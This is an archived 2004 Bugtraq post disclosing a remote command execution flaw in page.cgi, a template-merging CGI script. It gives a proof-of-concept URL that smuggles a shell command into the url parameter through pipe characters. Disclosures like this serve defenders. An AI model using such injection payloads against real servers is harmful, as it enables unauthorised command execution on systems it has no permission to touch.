Bugtraq mailing list archives

Remote Command Execution

From: Francisco Alisson <dominusvis () click21 com br>
Date: 6 Aug 2004 05:10:28 -0000



Script affected: page.cgi - content/template merging CGI
Author: Andrew Kilpatrick

We can execute arbitrary commands with same id of the webserver:

http://www.vulnerable.com/page.cgi?url=.html|id|

Thanks :)

<Dominus_Vis>
[Infektion Group]
irc.phey.net -j #infektion

Current thread:

Remote Command Execution Francisco Alisson (Aug 06)
- <Possible follow-ups>
- Remote Command Execution Francisco Alisson (Aug 09)